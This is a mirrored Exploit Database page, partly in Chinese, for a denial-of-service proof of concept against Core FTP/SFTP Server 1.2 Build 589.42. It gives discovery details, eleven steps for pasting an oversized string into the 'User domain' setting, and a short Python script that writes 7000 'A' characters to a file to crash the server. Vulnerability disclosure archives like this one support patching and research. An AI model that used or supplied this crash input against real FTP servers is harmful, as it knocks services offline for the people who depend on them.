Core FTP/SFTP Server 1.2 Build 589.42 – ‘User domain’ Denial of Service (PoC)

• Exploit Database
• 115 阅读

• 作者： Victor Mondragón
  日期： 2019-02-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46371/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

  #Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-02-13 #Vendor Homepage: http://www.coreftp.com/ #Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe #Tested Version: v2-Build 673 #Tested on: Windows 7 Service Pack 1 x32   #Steps to produce the crash: #1.- Run python code: Core_FTP_SFTP_Server_1.2.py #2.- Open core_code.txt and copy content to clipboard #3.- Open Core FTP Server #4.- Select "Setup" > "New" #5.- Select "Domain Name" and Put "Test" #6.- Select "Domain IP/Address" and Put "1.1.1.1" #7.- Select "Base directory" and Choose a directory path #8.- Enable "WinNT users" #9.- Select "User domain" and Paste Clipboard #10.- Click on "Ok" and the next window click "Ok" #11.- Crashed   cod = "\x41" * 7000   f = open('core_code.txt', 'w') f.write(cod) f.close()